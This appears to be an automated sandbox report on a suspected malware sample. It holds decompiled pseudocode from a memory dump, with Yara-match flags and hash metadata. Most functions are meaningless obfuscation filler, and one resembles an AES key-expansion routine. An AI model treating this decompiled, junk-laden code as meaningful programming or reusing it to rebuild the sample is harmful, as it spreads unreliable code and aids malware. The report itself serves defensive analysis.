            												__edx = __edx + 0x9620d5db;
            												__bl = __bl -  *0x4bd35cc6;
            												__ebp =  *0x640291e;
            												__esi = __esi + 1;
            												asm("sbb ch, [0xd93a56ca]");
            												_t18 = __edx;
            												__edx =  *0x827f1ed3;
            												 *0x827f1ed3 = _t18;
            												if(( *0x6be83698 & __eax) != 0) {
            													goto L1;
            												} else {
            													 *0xfc949b7a =  *0xfc949b7a << 0xe3;
            													 *0x70e2c5d3 = __esi;
            													__edx =  *0x2be3646a * 0x11e1;
            													__esi = __esi -  *0x814975f4;
            													 *0xaf063803 =  *0xaf063803 ^ __ecx;
            													 *0xb7bcccd8 = __ecx;
            													 *0x89a151ce =  *0x89a151ce >> 0xa3;
            													asm("rcl dword [0xbafeab2d], 0xce");
            													asm("scasb");
            													__ecx = __ecx + 1;
            													__esp = __esp ^  *0xe026e068;
            													__ecx = __ecx - 1;
            													asm("rcl dword [0xcfa8489e], 0x96");
            													 *0x3ab1481e =  *0x3ab1481e ^ __esi;
            													__esi = __esi ^ 0x6a81e3bf;
            													if(__esi != 0) {
            														goto L1;
            													} else {
            														_push( *0x6d8df075);
            														 *0xd0f82e6e =  *0xd0f82e6e >> 0x77;
            														_t21 = __edi;
            														__edi =  *0xd57e6d35;
            														 *0xd57e6d35 = _t21;
            														asm("scasb");
            														_push(__ebp);
            														 *0xd648148e = __edi;
            														__ebp = __ebp - 0xb4e4c5d8;
            														__ecx =  *0xfb106560 * 0x68ce;
            														asm("adc edi, [0xafab3ad9]");
            														_push( *0x82c38c1e);
            														if(__ecx >= 0) {
            															goto L1;
            														} else {
            															asm("adc ebp, 0xb324af73");
            															asm("scasd");
            															_t24 = __ecx;
            															__ecx =  *0x4f2976ce;
            															 *0x4f2976ce = _t24;
            															asm("rcl byte [0xfef21eb3], 0xc8");
            															__edi = __edi & 0xc35f196c;
            															asm("sbb cl, 0xb5");
            															__al = __al + 0x3c;
            															asm("adc ebp, [0x94430092]");
            															__eax =  *0x9cd4376b * 0xfda8;
            															__ebx = __ebx &  *0x8cac4f27;
            															 *0xbd8b2fd3 =  *0xbd8b2fd3 & __esi;
            															__edx = __edx - 1;
            															__ebp =  *0x90b4da35;
            															__eax =  *0x22f83e2b;
            															 *0xb84a4cd3 =  *0xb84a4cd3 >> 0x45;
            															__bl = __bl + 0x8a;
            															__esp = __eax;
            															__edi =  *0x7b9c6b69 * 0x5ae3;
            															 *0x768b6c1d =  *0x768b6c1d + __ebp;
            															asm("adc dh, 0x63");
            															__esp =  *0xbe838564;
            															asm("adc edi, [0xb416480d]");
            															asm("stosd");
            															__eax = __eax -  *0xa5e2e526;
            															if(__eax < 0) {
            																goto L1;
            															} else {
            																_t31 = __ebp;
            																__ebp =  *0xdfcbe470;
            																 *0xdfcbe470 = _t31;
            																__eax = __eax |  *0x896092ee;
            																__ebx = __ebx +  *0x7697839a;
            																 *0x218cd40a =  *0x218cd40a << 0x12;
            																__eax = __eax ^ 0xf9b90bf8;
            																 *0x22fbe69c =  *0x22fbe69c - __esp;
            																__eax = __eax & 0x9aa18339;
            																 *0x1b27479c =  *0xdfcbe470;
            																__ah = __ah ^ 0x0000000a;
            																asm("adc edx, 0x195a2f95");
            																__eax = __eax | 0xbf5a01f4;
            																__ebx = __ebx + 1;
            																__ecx =  *0xeec81e60 * 0xbf49;
            																asm("sbb ebx, [0x6e2db823]");
            																asm("ror byte [0x8df1d9c9], 0xdb");
            																 *0x9b714a24 =  *0x9b714a24 >> 0x37;
            																__eax = __eax + 1;
            																_pop( *0x3b9e1e66);
            																 *0x7ac5467 =  *0x7ac5467 << 0xbc;
            																asm("movsw");
            																 *0x5674b761 =  *0x5674b761 + __edx;
            																if( *0x5674b761 < 0) {
            																	goto L1;
            																} else {
            																	__ebp =  *0x3cd1847c * 0x33c7;
            																	asm("rol dword [0xdc8419ec], 0xb7");
            																	asm("ror dword [0x5400ce83], 0x96");
            																	__esi = __esi - 1;
            																	asm("cmpsb");
            																	__eax = __eax - 1;
            																	asm("adc ecx, 0xc9fa41bd");
            																	__cl =  *0x76248e3a;
            																	asm("sbb [0xcaf9e1ea], eax");
            																	__esi = __esi ^  *0xc56c4062;
            																	_push( *0x2e37851f);
            																	_push(__edx);
            																	__ebp = 1 +  *0x3cd1847c * 0x33c7;
            																	__al = __al | 0x00000088;
            																	asm("sbb edx, [0x97de79c]");
            																	if(__edx > 0) {
            																		goto L1;
            																		do {
            																			do {
            																				do {
            																					do {
            																						do {
            																							goto L1;
            																						} while (( *0x445a0020 & _t45) != 0);
            																						L1();
            																						_t47 = _t47 &  *0xa39a26e8;
            																						asm("adc [0xfa8c6dc4], ecx");
            																						_t6 = _t50;
            																						_t50 =  *0x20d04992;
            																						 *0x20d04992 = _t6;
            																						 *0xa24eab93 =  *0xa24eab93 >> 0xcf;
            																						 *0xdb117210 =  *0xdb117210 + _t41;
            																						 *0xc57f6f0a =  *0xc57f6f0a & _t41;
            																						_t56 = _t48 -  *0x5b414723;
            																					} while (_t56 > 0);
            																					 *0xdb3f7077 =  *0xdb3f7077 >> 0x12;
            																				} while (_t56 <= 0);
            																				asm("ror dword [0x636c3a76], 0xf2");
            																				_t40 = _t40 - 1;
            																				asm("rcl byte [0xd14aa1e5], 0x2f");
            																				 *0x29c3fe66 =  *0x29c3fe66 ^ _t48;
            																			} while ( *0x29c3fe66 < 0);
            																			 *0x4e5feb70 =  *0x4e5feb70 >> 0xe6;
            																			asm("cmpsb");
            																			_t46 =  *0x1d4e9123;
            																			_t47 = _t47 - 1;
            																			_pop(_t49);
            																			_pop( *0xc2c9ce03);
            																			asm("adc ebx, 0x7e887a0e");
            																			_t40 = _t40 + 1;
            																			L1();
            																			_t48 = _t49 &  *0xecd03ae8;
            																		} while (_t48 == 0);
            																		asm("adc edx, [0x34b9dd91]");
            																		return _t40;
            																	} else {
            																		__al = __al | 0x0000004e;
            																		return __eax;
            																	}
            																}
            															}
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}


            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • Opcode ID: 5937cafd4959b6dc36f5086ae70ad4c42cf4293cb40f9d2e03c0d98404eead57
            • Instruction ID: b0d0a089becf8dbf853df9768c1ff1ffba6d6e708cb3e2c8252f8990e9762a75
            • Opcode Fuzzy Hash: 5937cafd4959b6dc36f5086ae70ad4c42cf4293cb40f9d2e03c0d98404eead57
            • Instruction Fuzzy Hash: B3D1B732908742CFD715EF38D98AA417FB1F70A724B14439ED9A1931E1C77825A6CF89
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 53%
            			E0041D300(void* __eax, signed char __ebx, void* __ecx, void* __esi) {
            				signed char _t22;
            				signed char _t26;
            				signed char _t27;
            				void* _t29;
            				void* _t30;
            				signed char _t32;
            				signed char _t33;
            				signed char _t34;
            				signed int _t37;
            				signed int _t38;
            				void* _t47;
            
            				_t26 = __ebx;
            				_t22 = __eax + 0x3ad96b0f;
            				if(_t22 > 0) {
            					L1:
            					 *0x2bb20809 =  *0x2bb20809 ^ _t38;
            					_t37 = _t36 - 0xf9;
            					_push( *0x5c3f0d39);
            					asm("sbb ebp, [0x7bfc4837]");
            					 *0x4ccb6e8f =  *0x4ccb6e8f + _t37;
            					 *0x33252c02 =  *0x33252c02 & _t22;
            					asm("adc [0x14a4b01c], bl");
            					asm("sbb eax, [0xa782c11e]");
            					asm("rcr byte [0xbccb3a08], 0x70");
            					asm("rol dword [0xdec681c5], 0x2b");
            					_push( *0xdbd8b905);
            					_t38 = _t38 -  *0x8d5c8564 | 0xc70d9e2b;
            					asm("adc ebp, [0xd2aeaf05]");
            					_pop(_t29);
            					_push(0xe2a8d637);
            					_t27 = _t26 |  *0xf8c0133e;
            					asm("sbb esp, 0xe6900403");
            					_push(_t29);
            					 *0x4bff0661 = _t27;
            					asm("adc esi, 0x4010fe62");
            					_t30 = _t29 -  *0x293fe3fd;
            					asm("sbb [0x4c0a2dbc], edi");
            					 *0xe76ac8dc = _t30;
            					 *0xd52a0296 =  *0xd52a0296 & _t37;
            					_t26 = _t27 ^ 0x00000082;
            					_t36 =  *0x7158972b;
            					asm("ror dword [0x90539ee], 0xfb");
            					 *0x9e0d5b33 =  *0x9e0d5b33 >> 0xdf;
            					_t22 = (0x1f782644 &  *0x7323f70a) -  *0xf26185ed;
            					_t32 = _t30 +  *0x76e609dd ^ 0x00000063;
            					asm("adc dl, 0x4");
            					 *0xee4f0add =  *0xee4f0add ^ _t38;
            					_t47 = _t47 + 1;
            					asm("ror byte [0xc11568b1], 0x58");
            					_push( *0xfdd0567);
            				} else {
            					 *0x3a798377 =  *0x3a798377 - __ebx;
            					_push(__ebp);
            					__cl = __cl ^  *0xe385e2a0;
            					asm("adc [0xc6ce9df9], bh");
            					_t9 = __ecx;
            					__ecx =  *0x34e898ea;
            					 *0x34e898ea = _t9;
            					__ebp = __ebp +  *0x87971d9a;
            					__esi = __esi +  *0x41dad0c4;
            					__edx =  *0x93aedb69 * 0xdd55;
            					asm("adc esi, [0x7d24e283]");
            					if( *0x93aedb69 * 0xdd55 >= 0) {
            						goto L1;
            					} else {
            						__eax = __eax +  *0x77fd5f71;
            						asm("scasb");
            						 *0x2c0973a0 =  *0x2c0973a0 - __dh;
            						_pop(__ebp);
            						__ecx = __ecx + 1;
            						__esp = 0x61ce06c7;
            						if(__ecx != 0) {
            							goto L1;
            						} else {
            							 *0x76af17b =  *0x76af17b ^ __ebp;
            							 *0xcc01801e =  *0xcc01801e >> 0xd6;
            							asm("stosd");
            							if( *0xcc01801e == 0) {
            								goto L1;
            							} else {
            								 *0xc63781dc = 0x61ce06c7;
            								asm("scasb");
            								if(__eax <  *0x3b528e74) {
            									goto L1;
            								} else {
            									asm("sbb ebp, [0x50368f78]");
            									asm("adc [0x38b50410], bl");
            									__ebx = __ebx &  *0xce64b005;
            									asm("sbb edi, [0x6f93e396]");
            									asm("sbb ebp, 0x4d1b53d9");
            									if(( *0x38da5df & __ebx) <= 0) {
            										goto L1;
            									} else {
            										__ebx =  *0xd211d17e * 0x4c6f;
            										if(__ebx <= 0) {
            											goto L1;
            										} else {
            											__eax =  *0xa88b607e * 0x646;
            											__ch = __ch -  *0x9955d908;
            											if(__ch > 0) {
            												goto L1;
            											} else {
            												__edx =  *0x3e09c97f * 0xf244;
            												_t12 = __ecx;
            												__ecx =  *0x9164f73d;
            												 *0x9164f73d = _t12;
            												 *0xcd784909 =  *0xcd784909 >> 0xc0;
            												__ecx =  *0x9164f73d + 1;
            												_t13 = __ebx;
            												__ebx =  *0xa65c0b39;
            												 *0xa65c0b39 = _t13;
            												__esp = 0xffffffffc8a653f8;
            												if(0x61ce06c7 < 0) {
            													goto L1;
            												} else {
            													asm("adc edi, [0xdf1fa978]");
            													if(0x61ce06c7 >= 0) {
            														goto L1;
            													} else {
            														__edx = __edx -  *0xc8990b71;
            														if(( *0xe7f13c05 & __edx) != 0) {
            															goto L1;
            														} else {
            															 *0xdf1fa87b =  *0xdf1fa87b << 0;
            															if( *0xdf1fa87b >= 0) {
            																goto L1;
            															} else {
            																 *0x12370e71 = __edx;
            																__bh = __bh | 0x00000024;
            																__esp =  *0x1779016a * 0xa405;
            																asm("sbb [0xbc7ba80f], esi");
            																__ecx = 0x667c0e25;
            																if(__esp > 0) {
            																	goto L1;
            																} else {
            																	__esi =  *0x99783d7f * 0x1120;
            																	__bl = __bl ^ 0x000000e3;
            																	__ah = __ah +  *0xa491981a;
            																	 *0x3e85d393 =  *0x3e85d393 << 0x5b;
            																	__ebp = __ebp ^  *0x643707df;
            																	_pop(__esp);
            																	 *0xdaed681e =  *0xdaed681e ^ __ebx;
            																	 *0x1215d79e =  *0x1215d79e + __eax;
            																	asm("sbb [0x8b7bd982], cl");
            																	 *0xb71362c9 =  *0xb71362c9 << 0xb9;
            																	asm("rol dword [0x90da39f7], 0xe");
            																	__ebp = __ebp + 1;
            																	__esp = __esp - 1;
            																	asm("rcl dword [0xa773ab0d], 0x7a");
            																	asm("cmpsb");
            																	asm("rol dword [0xc4e034cd], 0x94");
            																	__ebx =  *0x45487295;
            																	__ebp = __ebp |  *0x9e4d103e;
            																	asm("sbb ebx, 0x9b4c3833");
            																	__ebx =  *0x45487295 + 1;
            																	 *0xc8f0c7df =  *0xc8f0c7df ^ __esp;
            																	asm("ror byte [0x9cf939b5], 0x8f");
            																	 *0xfacb122d =  *0xfacb122d + 0xb13da0fb;
            																	__ebp = __ebp ^ 0x0d5ac239;
            																	 *0xc9d9bda0 =  *0xc9d9bda0 + __al;
            																	__ebx =  *0x45487295 + 1 - 1;
            																	__ecx = 0x66700601;
            																	_push(__ebx);
            																	_push( *0xd04b15be);
            																	__edx =  *0xeb10cc6a * 0x5352;
            																	__ebx = __ebx &  *0x4962298f;
            																	__ebp = __ebp - 0xe636266;
            																	__ecx =  *0xb376cb9b;
            																	__eax = __eax ^  *0xe14e5c0e;
            																	 *0x9a162426 =  *0x9a162426 - __ebp;
            																	__esp = __esp | 0x7c15e3ef;
            																	asm("adc [0xa4ed158a], ah");
            																	__edx = 0x859c9db;
            																	__bh = __bh |  *0xb337586;
            																	__ah = __ah + 0x1a;
            																	_t16 = __ebx;
            																	__ebx =  *0xec75ef8c;
            																	 *0xec75ef8c = _t16;
            																	_push(0xc573a637);
            																	__esi =  *0xdf8727fe;
            																	 *0xdf8727fe =  *0x99783d7f * 0x1120;
            																	__esi =  *0xdf8727fe | 0x0ba42ecc;
            																	__esp = 0xb37df03e;
            																	if(( *0xdf8727fe | 0x0ba42ecc) < 0) {
            																		goto L1;
            																	} else {
            																		asm("scasd");
            																		 *0x5a7ebb36 =  *0x5a7ebb36 | 0x0859c9db;
            																		asm("rol dword [0x378ad38c], 0x8e");
            																		_pop(__esi);
            																		_push(0xa48c4c91);
            																		asm("scasb");
            																		 *0x1c6a54c6 =  *0x1c6a54c6 + __ch;
            																		asm("adc al, 0xa2");
            																		if( *0x1c6a54c6 < 0) {
            																			goto L1;
            																		} else {
            																			__edx = 0x859c9db -  *0x7e61b372;
            																			asm("sbb ebx, [0xb0614c07]");
            																			__ebx = __ebx & 0x713719ef;
            																			asm("rcr byte [0x523ef2f2], 0xc6");
            																			 *0x5daa4eec =  *0x5daa4eec >> 0x65;
            																			__bh = __bh | 0x00000084;
            																			asm("rol dword [0x92379f6d], 0xcc");
            																			if(__bh < 0) {
            																				goto L1;
            																			} else {
            																				__ecx = 0x5aee5c72;
            																				__ebp = __ebp |  *0xcf588f9c;
            																				__esi = __esi & 0x54681fa3;
            																				asm("sbb [0x28317bd7], ch");
            																				if(__esi < 0) {
            																					goto L1;
            																				} else {
            																					__esi =  *0xf3a0647c * 0xd21d;
            																					if(__bh <= 0) {
            																						goto L1;
            																						do {
            																							do {
            																								do {
            																									do {
            																										goto L1;
            																									} while ( *0xee4f0add > 0);
            																									 *0x648be5b9 =  *0x648be5b9 << 0x8c;
            																									 *0x708e6d0a =  *0x708e6d0a - _t32;
            																								} while ( *0x708e6d0a >= 0);
            																								asm("adc eax, 0x1227a573");
            																								asm("cmpsw");
            																								_pop(_t33);
            																								_t36 = _t36 ^ 0x000000b1;
            																								_t26 = _t26 ^  *0x53a5998a;
            																								_push( *0xae35f26c);
            																							} while (_t26 != 0);
            																							asm("sbb ebp, [0xd6c31d7a]");
            																							 *0x2b15d799 =  *0x2b15d799 << 0x30;
            																							asm("adc esi, [0xaf97c493]");
            																							_t34 = _t33 &  *0x9c2a4588;
            																							_t36 = 0x3aa6a99e;
            																							 *0x941c3909 = 0xe2a8d637;
            																						} while (_t34 >= 0);
            																						asm("sbb eax, [0x7c260b71]");
            																						 *0x63124625 = 0x3aa6a99e;
            																						 *0x544bde9b = _t38;
            																						_push(_t34);
            																						asm("adc [0x45783818], dh");
            																						 *0xf4266f07 = _t34;
            																						asm("sbb edi, 0x6ecf5f93");
            																						return _t22;
            																					} else {
            																						__ecx = 0xc36662fc;
            																						asm("adc dl, 0xc6");
            																						__esp = 0xffffffffb37df03f;
            																						__ebp = __ebp |  *0x2bc97133;
            																						 *0xedbcbe2c =  *0xedbcbe2c << 0x47;
            																						_push( *0x6a8436ef);
            																						__esp = 0xffffffffd1246c04;
            																						__eax = 0x8d4a7ddf;
            																						__esi = __esi & 0x93056e09;
            																						 *0x9e165e28 = __ah;
            																						__ecx = 0xc36662fc &  *0x6b059e0e;
            																						 *0x9e09410a =  *0x9e09410a + __dh;
            																						__esi =  *0x9e170b6a * 0x5b05;
            																						 *0x9e0737eb =  *0x9e0737eb >> 0x6c;
            																						__ecx = 0xc36662fc &  *0x6b059e0e ^  *0x2c88a603;
            																						asm("ror byte [0xc008a604], 0x4a");
            																						 *0x7dae04bf =  *0x7dae04bf << 0x97;
            																						return 0x8d4a7ddf;
            																					}
            																				}
            																			}
            																		}
            																	}
            																}
            															}
            														}
            													}
            												}
            											}
            										}
            									}
            								}
            							}
            						}
            					}
            				}
            			}

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • Opcode ID: ba5eac1c83eaec50bd19c45222c553214470a2a6f1ef31e84376d7f28b178a86
            • Instruction ID: f795008f5663590a00bb52eb0ea429ae0de5303dd029c076d807dffb583b36ff
            • Opcode Fuzzy Hash: ba5eac1c83eaec50bd19c45222c553214470a2a6f1ef31e84376d7f28b178a86
            • Instruction Fuzzy Hash: ADC152B3904341EFDB16DF39D88AB813FB2F752324B04865EC0A1675A5D778216ACF89
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 28%
            			E0041E1F9(signed char __eax, intOrPtr __ebx, signed char __ecx, signed int __edx, signed int __edi, signed int __esi, void* _a340257777) {
            				char _v3;
            				void* _v5;
            				signed char _t35;
            				void* _t36;
            				void* _t37;
            				signed char _t41;
            				signed char _t49;
            				signed int _t64;
            				signed int _t69;
            				signed int _t84;
            
            				_t69 = __esi;
            				_t64 = __edi;
            				_t57 = __edx;
            				_t48 = __ecx;
            				_t43 = __ebx;
            				_t35 = __eax;
            				goto L1;
            				do {
            					do {
            						do {
            							do {
            								do {
            									L1:
            									asm("rcl dword [0xb0939ff7], 0xd1");
            									 *0x748f83e7 =  *0x748f83e7 ^ _t35;
            									_t57 = (_t57 | 0x000000b7) ^  *0xe217dc62;
            									asm("sbb [0xc4bbc419], edi");
            									_t1 = _t35;
            									_t35 =  *0x759084e5;
            									 *0x759084e5 = _t1;
            									_t69 = _t69 - 1;
            									asm("sbb [0x218dd63], al");
            									asm("scasb");
            								} while ((_t48 & 0x000000b0) >= 0);
            								 *0xe77cd173 =  *0xe77cd173 - _t69;
            								asm("lodsb");
            								asm("sbb ebx, 0xef4544a1");
            								_t64 = _t64 ^ 0x2f9d1616;
            								asm("adc bh, 0x1c");
            								asm("sbb edi, 0x32c1ddbd");
            								_t4 = _t43;
            								_t43 =  *0xefa8e0cc;
            								 *0xefa8e0cc = _t4;
            								asm("adc edi, [0x85c02c16]");
            								asm("rol dword [0xb2efca25], 0xef");
            								_t48 = _t48 - 0x32;
            								_pop( *0xefa8e0cc);
            								_t57 = _t57 |  *0xa8e0cc32;
            								 *0xc83916ef = _t43;
            							} while (_t57 != 0);
            							asm("rol byte [0xd8a8c4a8], 0xfc");
            							 *0xc68ff209 =  *0x997775;
            							 *0xe0cc32c1 =  *0xe0cc32c1 | _t69;
            							 *0x3816efa8 =  *0x3816efa8 << 0x25;
            							asm("rcr dword [0x173a7bc8], 0xd8");
            							_push(_t57);
            							_t36 = _t35 + 1;
            							_t84 = 0x45c6a616 -  *0xef45d88d;
            							 *0x81c42916 = _t69;
            							 *0x50405217 = _t36;
            							_t49 = _t48 +  *0xef45d88d;
            							_t37 = _t36;
            							 *0xaddd0fb4 =  *0xaddd0fb4 + _t57;
            							_t64 = _t64 &  *0xef45d88d;
            							 *0x87dbae16 =  *0x87dbae16 & _t57;
            							asm("adc [0xe7553110], dl");
            							asm("rol dword [0x453d99a1], 0x8c");
            							_t43 = 0x1db40ffd;
            							 *0x2b16efa8 =  *0x2b16efa8 | _t49;
            							 *0xcc32c1ef =  *0xcc32c1ef ^ ( &_v3 +  *0x8b7a16ef |  *0x9cba1d16);
            							 *0x16efa8e0 =  *0x16efa8e0 | _t49;
            							_t35 = _t37 -  *0x17ff2f8a;
            							asm("rcr dword [0xefa8e0cc], 0xe3");
            							asm("sbb ecx, 0x7093ff16");
            							 *0xc5f7c62b =  *0xc5f7c62b - 0x45c6a616;
            							 *0xa8e0cc32 =  *0xa8e0cc32 + _t35;
            							asm("sbb ebx, [0x34f216ef]");
            							 *0x1ee67b3 =  *0x1ee67b3 - 0x1db40ffd;
            							_t69 =  *0x81c42916 & 0x395fc0d6;
            							_t48 = 0xa7;
            							 *0xa2f716d2 =  *0xa2f716d2 << 0x36;
            						} while ( *0xa2f716d2 <= 0);
            						 *0xe2aa9076 =  *0xe2aa9076 >> 0x82;
            						 *0x36b616d2 =  *0x36b616d2 + _t35;
            						asm("adc ah, [0xa816efa8]");
            						asm("sbb ch, 0xe2");
            						asm("scasb");
            						 *0xa8e0cc32 =  *0xa8e0cc32 >> 0x2b;
            						asm("ror dword [0xd79c0126], 0x27");
            						asm("rcl byte [0xba16efa8], 0xa6");
            						 *0xf9af869a =  *0xf9af869a >> 0xb4;
            						_t57 = 0x395fc3cc;
            						 *0x420816d2 =  *0x420816d2 & 0x395fc3cc;
            						asm("sbb edx, [0xf2c1ab9c]");
            						 *0xe0cc32ba =  *0xe0cc32ba >> 0xac;
            						asm("adc [0x416efa8], dh");
            						asm("adc esp, [0x16d24939]");
            						 *0x71c621c =  *0x71c621c - 0xffffffffffffffb3;
            						asm("movsb");
            						_t64 = 0xe0cc32c1 &  *0xcc32c1db;
            						_t48 = 0xe0;
            						asm("adc [0xfe16efa8], ch");
            						_t43 = 0x1db40f5f;
            					} while (0x1db40f5f >= 0);
            					 *0xd1b49ba0 = 0x395fc3cc;
            					asm("adc ebx, [0x395fa899]");
            					asm("sbb ah, 0xd2");
            					asm("adc edx, [0xc1dec32e]");
            					asm("rcl dword [0x470c16ef], 0x9b");
            					asm("sbb bh, 0xa0");
            					 *0xccecc9b4 =  *0xccecc9b4 >> 0x4e;
            					_t43 = 0x1db40f5f -  *0x49395fc2;
            					asm("sbb [0xc48616d2], bl");
            					_t69 = (_t69 &  *0xf4be16ef) - 0xe0cc32c1;
            					 *0x16efa8 =  *0x16efa8 << 0xd9;
            					asm("rol byte [0x704b93b7], 0x4");
            					asm("lodsb");
            					asm("adc dh, [0x395faf88]");
            					_t48 = 0xde;
            					_t35 =  *0x241016d2;
            					_t57 =  *0xd1b49ba0 -  *0xddbd3ccd &  *0xd88daddd;
            					_t31 = _t64 | 0x0fb45494;
            					_t64 =  *0xe04c16ef;
            					 *0xe04c16ef = _t31;
            				} while ( &_v3 > 0);
            				asm("sbb eax, [0xa8008977]");
            				 *0x9e3f16ef = _t84;
            				 *0xf9e2bc0 =  *0xf9e2bc0 >> 0xa5;
            				asm("sbb ecx, [0x40ecb2a1]");
            				asm("adc edx, [0x826380d6]");
            				 *0xd8a8c4a8 =  *0xd8a8c4a8 << 0x7e;
            				 *0xf9e2bbc =  *0xf9e2bbc ^ 0x395fc3cc;
            				asm("rcr dword [0xe24b16ef], 0x75");
            				 *0xf0cc319f =  *0xf0cc319f << 0xf1;
            				 *0x941616d2 = _t57;
            				asm("sbb ebx, 0xe0cc32c1");
            				asm("rcr byte [0xa8c4a800], 0x3a");
            				 *0x16ef45d8 =  *0x16ef45d8 ^  *0x9e3f16ef;
            				asm("sbb [0x173a78d6], eax");
            				_push( *0x941616d2 ^ 0x000000b6);
            				_t41 = _t35 +  *0x45d8a8c4 -  *0x8f16ef88 + 1;
            				_push(_t41);
            				asm("adc edi, [0xef45d88d]");
            				return _t41 | 0x00000016;
            			}

            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Similarity
            • Opcode ID: 1f86302cb3ac984c808b469e17c143c688400af69dabe9caa7c9cbc9c00ec6ce
            • Instruction ID: 6902a1d482b9c3ad5b68a038da537a92e34616af25d04aa9eb91ec022aa4e9c3
            • Opcode Fuzzy Hash: 1f86302cb3ac984c808b469e17c143c688400af69dabe9caa7c9cbc9c00ec6ce
            • Instruction Fuzzy Hash: E48104365487C1DFEB05CF38E89A6463FB5F786320B48078EC8A19B5D2C774116ADB85
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 68%
            			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
            				signed int _t66;
            				signed int* _t72;
            				signed int* _t84;
            				signed int _t97;
            				signed int _t99;
            				signed int _t109;
            				signed int _t111;
            				signed int* _t113;
            				signed int _t130;
            				signed int _t132;
            				signed int _t136;
            				signed int _t144;
            				signed int _t155;
            				signed int _t163;
            				intOrPtr _t174;
            
            				_t84 = _a12;
            				_t113 = _a8;
            				asm("ror esi, 0x8");
            				asm("rol eax, 0x8");
            				 *_t113 =  *_t84 & 0xff00ff00 |  *_t84 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t113[1] = _t84[1] & 0xff00ff00 | _t84[1] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t113[2] = _t84[2] & 0xff00ff00 | _t84[2] & 0x00ff00ff;
            				_t163 = _t84[3];
            				_t66 =  &(_t113[1]);
            				asm("ror edi, 0x8");
            				_t144 = _t163 & 0xff00ff00;
            				asm("rol esi, 0x8");
            				_t113[3] = _t144 | _t163 & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t113[4] = _t84[4] & 0xff00ff00 | _t84[4] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t113[5] = _t84[5] & 0xff00ff00 | _t84[5] & 0x00ff00ff;
            				asm("ror edi, 0x8");
            				asm("rol esi, 0x8");
            				_t113[6] = _t84[6] & 0xff00ff00 | _t84[6] & 0x00ff00ff;
            				asm("ror esi, 0x8");
            				asm("rol ecx, 0x8");
            				_t113[7] = _t84[7] & 0xff00ff00 | _t84[7] & 0x00ff00ff;
            				if(_a16 != 0x100) {
            					L5:
            					return _t66 | 0xffffffff;
            				} else {
            					_t174 = _a4;
            					_t72 = 0;
            					_a12 = 0;
            					while(1) {
            						_t155 =  *(_t66 + 0x18);
            						_t97 = ( *(_t174 + 4 + (_t155 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t174 +  &(_t72[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t174 + 4 + (_t155 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t174 + 5 + (_t155 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t174 + 4 + (_t155 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
            						_t130 =  *_t66 ^ _t97;
            						 *(_t66 + 0x1c) = _t97;
            						_t99 =  *(_t66 + 4) ^ _t130;
            						 *(_t66 + 0x20) = _t130;
            						_t132 =  *(_t66 + 8) ^ _t99;
            						 *(_t66 + 0x24) = _t99;
            						 *(_t66 + 0x28) = _t132;
            						if(_t72 == 6) {
            							break;
            						}
            						_t109 = ( *(_t174 + 4 + (_t132 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t174 + 4 + (_t132 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t174 + 4 + (_t132 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t174 + 5 + (_t132 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
            						_t136 =  *(_t66 + 0x10) ^ _t109;
            						 *(_t66 + 0x2c) = _t109;
            						_t111 =  *(_t66 + 0x14) ^ _t136;
            						 *(_t66 + 0x34) = _t111;
            						_t72 =  &(_a12[0]);
            						 *(_t66 + 0x30) = _t136;
            						 *(_t66 + 0x38) = _t111 ^ _t155;
            						_t66 = _t66 + 0x20;
            						_a12 = _t72;
            						if(_t72 < 7) {
            							continue;
            						} else {
            							goto L5;
            						}
            						goto L7;
            					}
            					return 0xe;
            				}
            				L7:
            			}



















            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 64%
            			E00402D87(signed int __eax, signed int __ecx, signed int __esi, signed int* _a8, signed int _a12, intOrPtr _a16, intOrPtr _a20) {
            				intOrPtr _t74;
            				signed int _t87;
            				signed int _t100;
            				signed int _t102;
            				signed int _t112;
            				signed int _t114;
            				signed int* _t116;
            				signed int _t133;
            				signed int _t135;
            				signed int _t139;
            				signed int _t140;
            				signed int _t152;
            				signed int* _t173;
            
            				_t161 = __esi;
            				_t87 = __ecx;
            				_t64 = __eax;
            				_pop(ss);
            				_push(0x13);
            				 *__esi =  *__esi & __ecx;
            				if( *__esi < 0) {
            					asm("cmc");
            					_t87 = _a12;
            					_t116 = _a8;
            					_push(__esi);
            					_push(_t140);
            					asm("ror esi, 0x8");
            					asm("rol eax, 0x8");
            					 *_t116 =  *_t87 & 0xff00ff00 |  *_t87 & 0x00ff00ff;
            					asm("ror edi, 0x8");
            					asm("rol esi, 0x8");
            					_t116[1] =  *(_t87 + 4) & 0xff00ff00 |  *(_t87 + 4) & 0x00ff00ff;
